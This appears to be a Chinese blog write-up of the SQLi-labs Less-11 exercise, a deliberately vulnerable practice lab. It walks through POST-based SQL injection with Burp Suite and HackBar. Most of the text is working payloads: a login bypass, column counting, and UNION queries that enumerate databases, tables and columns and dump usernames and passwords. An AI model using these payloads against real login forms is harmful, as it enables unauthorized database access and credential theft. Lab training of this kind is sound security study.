Less-11 post传递
Less-11至less-20为post传递,post注入是通过对输入框进行传参,可以被带入数据库进行的查询

注入的两个条件:
1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询
首先我们用burp-suite进行抓包,配合hackbar进行注入
抓包,配置好burp-suite代理,

这里可以看到post传参的过程,将其复制,使用harkbar中的post data,开始注入

**
判断注入点
**
uname=’ or 1=1# &passwd=&submit=Submit 登录成功,判断这里为单引号闭合
(–+注释在URL中适用,在post传递中我们采用#进行注释)

判断字段个数,用于后面确定显示位:
uname=’ order by 3# &passwd=&submit=Submit 返回错误:

uname=’ order by 2# &passwd=&submit=Submit 无回显,确定字段为2
得到显示位:
uname=’ union select 1,2# &passwd=&submit=Submit

**
使用union联合查询当前数据库:
**
uname=’ union select 1,database()# &passwd=&submit=Submit

查询所有数据库(使用group_concat)
uname=’ union select 1,(select group_concat(schema_name) from information_schema.schemata )# &passwd=&submit=Submit

查询security库中的表:
uname=’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ )# &passwd=&submit=Submit

查询users表中的字段:
uname=’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)# &passwd=&submit=Submit

查询users表中username字段的信息:
uname=’ union select 1,(select group_concat(username) from security.users)#&passwd=&submit=Submit

查询password字段的信息:
uname=’ union select 1,(select group_concat(password) from security.users)#&passwd=&submit=Submit
将username和password连接后再输出:
uname=’ union select 1,(select group_concat(concat_ws(’-’,username,password)) from security.users)#&passwd=&submit=Submit

未完待续。。。
本文详细介绍了SQL注入攻击的原理和步骤,通过使用Burp Suite和HackBar工具进行POST数据注入,展示了如何判断注入点、确定字段个数、查询数据库信息等。通过联合查询获取了数据库名、表名、字段名以及数据,揭示了SQL注入的危害及其检测防范的重要性。
1073

被折叠的 条评论
为什么被折叠?



